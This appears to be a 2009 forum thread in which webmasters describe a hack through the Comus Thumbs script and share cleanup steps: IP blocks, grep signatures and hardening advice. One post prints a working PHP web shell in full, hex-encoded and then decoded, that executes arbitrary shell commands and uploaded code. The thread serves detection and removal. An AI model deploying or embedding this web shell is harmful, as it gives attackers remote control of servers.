Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected - GoFuckYourself.com

hjnet · 09-21-2009, 01:38 AM

Just as a warning for everyone, I had two old copies of comus on a Server with ~20 other Domains. Looks like some hacker managed to break in through comus to load up a script that simply added some malicious Java Script code to EVERY HTML and PHP file on my Server that have been set to 777 file permissions. So some of my Smart Thumbs copies have been affected, and even some of my old static HTML galleries.

As far as I know there isn't an security update from Comus available by now, so I simply had to delete my two old copies from the Server as it was too risky to keep them there. So if you have Comus on your Box watch it very closely or get rid of the installations.

beta-tester · 09-21-2009, 01:39 AM

How come that I didn't get any of this shit? Maybe my server security is too good?

hjnet · 09-21-2009, 01:47 AM

Quote:

Originally Posted by beta-tester

How come that I didn't get any of this shit? Maybe my server security is too good?

Yeah, I was thinking the same until yesterday

asianseekerz · 09-21-2009, 02:26 AM

sometimes its always on the server side securities if you get hacked!!!

k0nr4d · 09-21-2009, 02:34 AM

Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.

qxm · 09-21-2009, 03:04 AM

Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...

TheDA · 09-21-2009, 03:17 AM

There's been a few people hit wit this in the past few days

hjnet · 09-21-2009, 03:34 AM

Quote:

Originally Posted by k0nr4d

Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in.

It's definitely a Comus hack, in my case it was a php script that got executed every ~10 minutes through an external request from an IP in China. I've blocked the IP from my server and it was gone. Many other webmasters are affected too ATM, so this thread should basically a warning for others to have a close eye on their sites

hjnet · 09-21-2009, 03:39 AM

Quote:

Originally Posted by qxm

Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert...

Yes but check your other HTML and PHP files too on that Server, even if they're on other domains. Take a look at the Java Script code that got inserted in your hacked pages, and search your entire Server for files that might contain that piece of string too

i.e. grep -R "function Sym1" * > list_of_infected_files

Oh, and at first you might wanna try blocking the IP that calls for the script that put's that malicious Java Script code into your files

iptables -A INPUT -s 122.70.145.151 -j DROP

Davy · 09-21-2009, 04:36 AM

Quote:

Originally Posted by hjnet

Yeah, I was thinking the same until yesterday

You guys probably never followed the advice to chmod everything to 777.

cykoe6 · 09-21-2009, 07:04 AM

Fuccckkkkkkkkk this hack got me too. I am deleting my old Comus install now but from what I understand even after you have deleted Comus there are a bunch more backdoors that have likely been installed on the server and have to be rooted out.

Agent 488 · 09-21-2009, 07:10 AM

guess that is the final nail in the coffin for comus.

wish the best. hacks suck.

SuzzyQ · 09-21-2009, 07:33 AM

I am wondering if I delete all the comus installs, have my host load an old backup in and set the files to read only files, will that take care of things?

Anybody?

HEAT · 09-21-2009, 07:37 AM

1. Install mod_security. (will stop code injection and defend from web attack.)

2. Migrate Comus Thumbs to Smart Thumbs - export and import gals, set cron/templates/trades/secure.php/etc..

3. Remove CT completely.

4. Find bad phpshell scripts(backdoor) that hacker installed into your server and remove them.

Quote:

grep -R 696620287374 * > /home/backdoor.txt &

(will find backdoor scripts under /home and save list to /home/backdoor.txt - normally they named with 'backup.php, sync.php')

5. Find infected website files and edit/delete.

Quote:

grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &

(will find all js code injected files under /home and save list to /home/infected.txt)

6. Repeat #4~#5.

7. Setup better security.
change all server passwords(linux users/mysql users/web logins).
install Rootkit Hunter.
update APPs via yum(centOS).
apache in suexec mode, use suphp, no 777 permission.
use SFTP.
update mod_security rules.
install reliable anti-spyware to your local machine.

hjnet · 09-21-2009, 07:49 AM

Quote:

Originally Posted by HEAT

grep -R 696620287374 * > /home/backdoor.txt &

Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect

Quote:

Originally Posted by HEAT

5. Find infected website files and edit/delete.

grep -R svrtsg:#9@#yliwvi:#mlmv@# * > /home/infected.txt &

For example I had to search for another piece of string to find my infected files, looks like the guy doesn't use the same code strings for his infections all the time

P.S. I'd REALLY like to break some kneecaps today

hjnet · 09-21-2009, 10:03 AM

Bump Bump

HEAT · 09-21-2009, 11:24 AM

Quote:

Originally Posted by hjnet

Did you check that the "696620287374" is the same in all backdoor files? Cause I think a "smart" hacker would use randomized files to ensure they're harder to detect

Yes, all backdoors had the same strings starting with 6966202873 in my case.
Here is the full php code:

Quote:

echo " ";
$s = "696620287374726C656E28245F504F53545B6363635D293D3 D30297B69662028245F504F53545B706173735D213D2731323 327297B6563686F20273C68746D6C3E3C626F6479206267636 F6C6F723D23424246464242206F6E6C6F61643D22646F63756 D656E742E6D79662E706173732E666F63757328293B223E3C6 66F726D206D6574686F643D504F53543E3C696E707574206E6 16D653D706173733E3C2F666F726D3E3C2F626F64793E3C2F6 8746D6C3E273B6578697428293B7D6563686F20273C68746D6 C3E3C626F6479206267636F6C6F723D23424246464242206F6 E6C6F61643D22646F63756D656E742E6D79662E63632E666F6 3757328293B223E273B6563686F20273C666F726D206E616D6 53D6D7966206D6574686F643D504F535420656E63747970653 D226D756C7469706172742F666F726D2D64617461223E3C696 E70757420747970653D68696464656E206E616D653D7061737 32076616C75653D272E245F504F53545B706173735D2E273E3 C696E70757420747970653D66696C65206E616D653D7570666 96C653E3C696E707574206E616D653D6E65776E616D653E3C6 96E70757420747970653D7375626D69743E3C62723E273B656 3686F20273C696E707574206E616D653D63632073697A653D3 7332076616C75653D22272E7374726970736C6173686573282 45F504F53545B63635D292E27223E3C2F666F726D3E273B656 3686F20273C7072653E273B20696620286D6F76655F75706C6 F616465645F66696C6528245F46494C45535B27757066696C6 5275D5B27746D705F6E616D65275D2C20245F504F53545B6E6 5776E616D655D2929207B202F2A6563686F202253656E742E3 C62723E5C6E223B2A2F207D69662028245F504F53545B6D666 96C655D29207B2020202466703D666F70656E28245F504F535 45B6E65776E616D655D2C277727293B202020666F7228246B3 D303B20246B3C7374726C656E28245F504F53545B6D66696C6 55D293B20246B2B3D322920207B20202020246363203D20737 56273747228245F504F53545B6D66696C655D2C246B2C32293 B20202020246363203D20273078272E2463633B20202020202 02020246363203D20726F756E6428246363293B20202020246 363203D2063687228246363293B20202020667772697465282 466702C246363293B2020207D202066636C6F7365282466702 93B207D24636F3D7374726970736C617368657328245F504F5 3545B63635D293B20246F7574203D2027273B69662866756E6 374696F6E5F6578697374732827657865632729297B6578656 32824636F2C246F7574293B246F7574203D206A6F696E28225 C6E222C246F7574293B7D656C736569662866756E6374696F6 E5F657869737473282770617373746872752729297B6F625F7 37461727428293B70617373746872752824636F293B246F757 4203D206F625F6765745F636F6E74656E747328293B6F625F6 56E645F636C65616E28293B7D656C736569662866756E63746 96F6E5F657869737473282773797374656D2729297B6F625F7 37461727428293B73797374656D2824636F293B246F7574203 D206F625F6765745F636F6E74656E747328293B6F625F656E6 45F636C65616E28293B7D656C736569662866756E6374696F6 E5F65786973747328277368656C6C5F657865632729297B246 F7574203D207368656C6C5F657865632824636F293B7D656C7 36569662869735F7265736F75726365282466203D20706F706 56E2824636F2C2272222929297B246F7574203D2022223B776 8696C6528214066656F662824662929207B20246F7574202E3 D2066726561642824662C31303234293B7D70636C6F7365282 466293B7D656C7365207B246F75743D276578206661696C656 4273B7D6563686F20246F75743B6563686F20273C2F7072653 E273B6563686F20273C2F626F64793E3C2F68746D6C3E273B7 D20656C7365207B6966286765745F6D616769635F71756F746 5735F6770632829297B6576616C287374726970736C6173686 57328245F504F53545B6363635D29293B7D20656C7365207B6 576616C28245F504F53545B6363635D293B7D7D";
$sss = "";
$k = 0;
for ( ; $k < strlen( $s ); $k += 2 )
{
$ss = chr( "0x".substr( $s, $k, 2 ) + 0 );
$sss .= $ss;
}
eval( $sss );
$ssss = "************************************************* ************************************************** *********************************";
echo "\r\n";
?>

Code decripted :

Quote:

if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru' )){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_ exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_PO ST[ccc]));} else {eval($_POST[ccc]);}}

I found out it's just another ordinary blind SQL injection attack that has this pattern:

Quote:

I don't think this string can't be randomized since it is phpshell and uses 'shell_exec' function.
or if you had installed mod_security, look into /var/log/httpd/modsec_debug.log.

whatever code they have on file, mod_security blocks system calls via web.
you will find a bunch of these logs :

Quote:

[Sun Sep 20 11:00:33 2009] [error] [client 122.70.145.151] ModSecurity: Access denied with code 501 (phase 2). Pattern match "(?:\\b(??:n(?:et(?:\\b\\W+?\\blocalgroup|\\.e xe )|(?:map|c)\\.exe)|t(?:racer(?:oute|t)|elnet\\.exe |clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\.exe|echo \\b\\W*?\\by+)\\b|c(?:md(??:32)?\\.exe\\b|\\b\\W *?\\/c)|d(?:\\b\\W*?[\\\\/]|\\W*?\\.\\.)|hmod.{0,40}?\\+.{0,3}x))|[\\;\\|\\`]\\W*? ..." at ARGS:ccc. [file "/etc/httpd/modsecurity.d/modsecurity_crs_40_generic_attacks.conf"] [line "133"] [id "950006"] [msg "System Command Injection"] [data ";\\x0a echo"] [severity "CRITICAL"] [tag "WEB_ATTACK/COMMAND_INJECTION"] [hostname "domain.com"] [uri "/vid/86/vgoJ6xWBzS/vgoJ6xWBzS.php"] [unique_id "oF4EtExMEtMAABs4u8sAAAA2"]

so analyze the log file and catch all php files sending system commands. then you can compare all strings.

And for infected web files, yes looks like the backdoors didn't inject the same js code. each code has different encrypted malware url. So classify all html/php files that have 777 permision then abstract those different codes and make your own grep strings for full search.
Luckly, I had only one common string.

hjnet · 09-22-2009, 09:57 AM

Quote:

Originally Posted by HEAT

Yes, all backdoors had the same strings starting with 6966202873 in my case.

Thanks, I've already found a few backdoor files in the thumbs folder of one of my ST installations. The string to search for is indeed "6966202873" on my backdoor files too

So people search your servers:

grep -R "6966202873" * > list_of_backdoor_files

Oh, and the backdoor files are called "sync.php, thumbs.php and backup.php" in my case, user:group -> nobody:nobody

pussyluver · 09-22-2009, 11:25 AM

Anyone hear from Sixzeros or CT on what's up??

nico-t · 09-22-2009, 11:37 AM

how do i prevent this? ive got ct on a test site so it doesnt matter how, its not yet hacked. What files do i have to change from 777 to something else when i want to prevent it?

hjnet · 09-22-2009, 11:50 AM

Quote:

Originally Posted by nico-t

how do i prevent this? ive got ct on a test site so it doesnt matter how, its not yet hacked. What files do i have to change from 777 to something else when i want to prevent it?

I don't know HOW exactly they came in through ComusThumbs, but once in the backdoor file starts to create multiple backdoors in other folders of your Server, no matter which domain, and starts infecting writable files (777 and i.e. 666) with some malicious java script.

So if you REALLY intend to keep your copy of CT you should at least ensure that NO files on your server are writable by the user "nobody", and maybe block the IP I've mentioned earlier in this thread from accessing your Server.

Oh, and search for the strings given in this thread with grep, maybe you're already infected and just didn't recognize it by now....

hjnet · 09-25-2009, 03:18 AM

Just as a short summary how I got rid of this infection sofar

-At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

iptables -A INPUT -s 122.70.145.151 -j DROP

And Spudstr from YellowFiber also suggestes to block 122.64.0.0/11

iptables -A INPUT -s 122.64.0.0/11 -j DROP

- Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available

- Next I've scanned my Server for for any INFECTED Files

grep -R "function Sym1" * > list_of_infected_files
grep -R "function STy6" * > another_list_of_infected_files

These are the only two different types of insertions I've found sofar on my Server, might be possibble that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.

- And finally get rid of the backdoor files:

grep -R "6966202873" * > list_of_backdoor_files

The backdoor files on my Server where called something like backup.php, sync.php, thumbs.php

I hope that's it sofar, now it's time to tighten Server Security a bit more

Wiredoctor · 09-25-2009, 06:19 AM

Quote:

Originally Posted by pussyluver

Anyone hear from Sixzeros or CT on what's up??

Are they even still around ??? Do they even care? Do they have a patched Fix available?

nico-t · 09-25-2009, 08:32 AM

im no server expert so i just deleted it all.

hjnet · 10-02-2009, 04:31 AM

Bump Bump

Naughty-Pages · 10-02-2009, 05:51 AM

add me to the list ...

fuck.. had noticed a few sites of mine with trojans on it a little over a week ago but was on the road and couldn't do much about it.. (the list is now up to 14 sites that have had code added to them)..

narrowed it down to assuming it was the one site that i use Comus on as being the soruce of the problems and then searched GFY for Comus to confirm others were having an issue... and here we are...

looks like i'll be killing it as Comus has no update, and going to their site to redownload a frsh copy to make sure i had the latest version just gives an error...

on this one server i probably have 200-300 sites.. i'm sure that there's more than 14 infected.. looks like i am going to have dun today..

wizzart · 10-04-2009, 03:00 PM

good info thatnks

Carmine Raguso · 10-04-2009, 03:01 PM

Quote:

Originally Posted by wizzart

good info thatnks

This is old news man. Get with the program. Stop bumping old shit.

Fletch XXX · 10-04-2009, 03:15 PM

Quote:

Originally Posted by nico-t

im no server expert so i just deleted it all.

same. had it sitting on a site, and just hit delete on the CT dir.

lol

Naughty-Pages · 10-04-2009, 05:05 PM

Quote:

Originally Posted by Carmine Raguso

This is old news man. Get with the program. Stop bumping old shit.

Umm.. actually smart ass, this is a different/new issue.. and this thread is not old.. this is a current problem...

Looking through your post history, it's apparent you are a troll.. and your posts have nothing of value whatsoever.. Looking through the past couple weeks of your posts I can only assume you are not even a webmaster.. just really dumb shit..

more info is here:
http://www.gofuckyourself.com/showthread.php?t=931492

please ignore the troll with the avatar of his boyfriend..

pornpf69 · 10-04-2009, 05:43 PM

I had the same issue... and got about 20 or 30 sites hacked because of CT... I have removed all CT's I had... and redirected those domains to some CAM sites...

Naughty-Pages · 10-04-2009, 08:02 PM

Quote:

Originally Posted by Carmine Raguso

This is old news man. Get with the program. Stop bumping old shit.

We interrupt this thread for a public GFY announcement:
Carmine Raguso is the OFFICIAL WINNER of the GFY Troll of the Week award!!!
yup.. he won..

Dennis69 · 10-05-2009, 06:14 AM

Quote:

Originally Posted by hjnet

Just as a short summary how I got rid of this infection sofar

-At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files

iptables -A INPUT -s 122.70.145.151 -j DROP

And Spudstr from YellowFiber also suggestes to block 122.64.0.0/11

iptables -A INPUT -s 122.64.0.0/11 -j DROP

- Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available

- Next I've scanned my Server for for any INFECTED Files

grep -R "function Sym1" * > list_of_infected_files
grep -R "function STy6" * > another_list_of_infected_files

These are the only two different types of insertions I've found sofar on my Server, might be possibble that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets.

- And finally get rid of the backdoor files:

grep -R "6966202873" * > list_of_backdoor_files

The backdoor files on my Server where called something like backup.php, sync.php, thumbs.php

I hope that's it sofar, now it's time to tighten Server Security a bit more

Is this all done through SSH?

09-21-2009, 01:38 AM	#1
hjnet Confirmed User Join Date: May 2002 Location: European Union Posts: 3,815	Secure/Delete your Comus Installation, ALL HTML/PHP Files on Server infected Just as a warning for everyone, I had two old copies of comus on a Server with ~20 other Domains. Looks like some hacker managed to break in through comus to load up a script that simply added some malicious Java Script code to EVERY HTML and PHP file on my Server that have been set to 777 file permissions. So some of my Smart Thumbs copies have been affected, and even some of my old static HTML galleries. As far as I know there isn't an security update from Comus available by now, so I simply had to delete my two old copies from the Server as it was too risky to keep them there. So if you have Comus on your Box watch it very closely or get rid of the installations.

09-21-2009, 01:39 AM	#2
beta-tester Rock 'n Roll Baby! Join Date: Sep 2004 Location: USA, temporarly Posts: 22,562	How come that I didn't get any of this shit? Maybe my server security is too good? __________________ Sig for sale. Affordable prices. Contact me and get a great deal ;) My contact: ICQ: 944-320-46 e-mail: manca {AT} HotFreeSex4All.com

09-21-2009, 03:04 AM	#6
qxm Confirmed User Join Date: Jul 2006 Location: NoHo Posts: 5,970	Just checked one of my old tgps (the only one that still had comus installed)......... yeap.... had to put a 302 htaccess redirect to one of my other sites... every thumb redirect was causing my antivirus to go on full alert... __________________ ICQ: 266990876

09-21-2009, 07:04 AM	#11
cykoe6 Confirmed User Industry Role: Join Date: Apr 2005 Location: Vegas Posts: 4,499	Fuccckkkkkkkkk this hack got me too. I am deleting my old Comus install now but from what I understand even after you have deleted Comus there are a bunch more backdoors that have likely been installed on the server and have to be rooted out. __________________ бабки, шлюхи, сила

09-25-2009, 03:18 AM	#22
hjnet Confirmed User Join Date: May 2002 Location: European Union Posts: 3,815	Just as a short summary how I got rid of this infection sofar -At first block 122.70.145.151 from accessing your Server, it's an IP in China that triggers the backdoor files on YOUR Server every ~ 10 Minutes to infect writable files iptables -A INPUT -s 122.70.145.151 -j DROP And Spudstr from YellowFiber also suggestes to block 122.64.0.0/11 iptables -A INPUT -s 122.64.0.0/11 -j DROP - Then get rid of your Comus installations, I've simply deleted the entire /ct/ folder as I didn't use my installations anyway. That was the only solution for me as long as there's no security patch available - Next I've scanned my Server for for any INFECTED Files *grep -R "function Sym1" > list_of_infected_files grep -R "function STy6" * > another_list_of_infected_files These are the only two different types of insertions I've found sofar on my Server, might be possibble that there are more out there, please let us know if you come across new ones so everybody could search their Server for the matching string snippets. - And finally get rid of the backdoor files: grep -R "6966202873" * > list_of_backdoor_files** The backdoor files on my Server where called something like backup.php, sync.php, thumbs.php I hope that's it sofar, now it's time to tighten Server Security a bit more Last edited by hjnet; 09-25-2009 at 03:22 AM..

09-21-2009, 02:26 AM	#4
asianseekerz Confirmed User Join Date: Aug 2008 Posts: 1,609	sometimes its always on the server side securities if you get hacked!!! __________________ LUSTY LIFES : Dad & Daughter Wild Adventures : Naughty Wild Sister Contact : ICQ : 372109 Email add: [email protected]

09-21-2009, 02:34 AM	#5
k0nr4d Confirmed User Industry Role: Join Date: Aug 2006 Location: Poland Posts: 9,229	Run a virus scan. Usually this stuff isn't caused by someone hacking your server or exploiting your script, but rather by a virus on your computer that logs in and puts this shit in. __________________ Mechanical Bunny Media Mechbunny Tube Script \| Mechbunny Webcam Aggregator Script \| Custom Web Development

09-21-2009, 03:17 AM	#7
TheDA Confirmed User Industry Role: Join Date: May 2006 Posts: 4,665	There's been a few people hit wit this in the past few days

09-21-2009, 07:10 AM	#12
Agent 488 Registered User Industry Role: Join Date: Feb 2006 Posts: 22,511	guess that is the final nail in the coffin for comus. wish the best. hacks suck.

09-21-2009, 07:33 AM	#13
SuzzyQ Confirmed User Industry Role: Join Date: Dec 2006 Location: Along the shore. Posts: 1,557	I am wondering if I delete all the comus installs, have my host load an old backup in and set the files to read only files, will that take care of things? Anybody?

09-21-2009, 10:03 AM	#16
hjnet Confirmed User Join Date: May 2002 Location: European Union Posts: 3,815	Bump Bump

09-22-2009, 11:25 AM	#19
pussyluver Clueless OleMan Join Date: Mar 2003 Location: ICQ - 169903487 Posts: 11,009	Anyone hear from Sixzeros or CT on what's up??

09-22-2009, 11:37 AM	#20
nico-t emperor of my world Join Date: Aug 2004 Location: nethalands Posts: 29,903	how do i prevent this? ive got ct on a test site so it doesnt matter how, its not yet hacked. What files do i have to change from 777 to something else when i want to prevent it?

09-25-2009, 08:32 AM	#24
nico-t emperor of my world Join Date: Aug 2004 Location: nethalands Posts: 29,903	im no server expert so i just deleted it all.

10-02-2009, 04:31 AM	#25
hjnet Confirmed User Join Date: May 2002 Location: European Union Posts: 3,815	Bump Bump

10-02-2009, 05:51 AM	#26
Naughty-Pages Confirmed User Industry Role: Join Date: Oct 2006 Location: SWFL Posts: 4,533	add me to the list ... fuck.. had noticed a few sites of mine with trojans on it a little over a week ago but was on the road and couldn't do much about it.. (the list is now up to 14 sites that have had code added to them).. narrowed it down to assuming it was the one site that i use Comus on as being the soruce of the problems and then searched GFY for Comus to confirm others were having an issue... and here we are... looks like i'll be killing it as Comus has no update, and going to their site to redownload a frsh copy to make sure i had the latest version just gives an error... on this one server i probably have 200-300 sites.. i'm sure that there's more than 14 infected.. looks like i am going to have dun today.. __________________ *400 HARDL1NKS only $117! - (100 for $45)* BL0G P0STS $1.85+ \| 55,000 Word Comprehensive Synonym Database 2 REVIEW COPIES AVAIL AT 50% OFF! \| 16 yr old Aged Domains 4Sale ICQ: 265-593-735 ~ Skype: Naughty-Pages ~ email: ez_money4u(at)comcast(dot)net

10-04-2009, 03:00 PM	#27
wizzart scriptmaster Industry Role: Join Date: May 2006 Location: Serbia Posts: 5,237	good info thatnks

10-04-2009, 05:43 PM	#31
pornpf69 Too lazy to set a custom title Join Date: Jun 2004 Location: Brasil Posts: 15,778	I had the same issue... and got about 20 or 30 sites hacked because of CT... I have removed all CT's I had... and redirected those domains to some CAM sites... __________________ Do you need cheap, fast and reliable porn website hosting? Host Head is the way to go!! Asian Gay Special \| Live on MSN - Live Webcam Chat \| Live Adult Webcam Performances \| MY SWEET BLACKS LIVE ON CAM Cash X \| OK Pay \| Pukka Ropes \| Pukka Fetish \| STRAPED BLOG \| Male Bound and Fucked Pukka Tranny \| Tattooed Shemales \| She's A He \| Menu Porno \| Porn Performances \| All Chubby MY ICQ# 169833797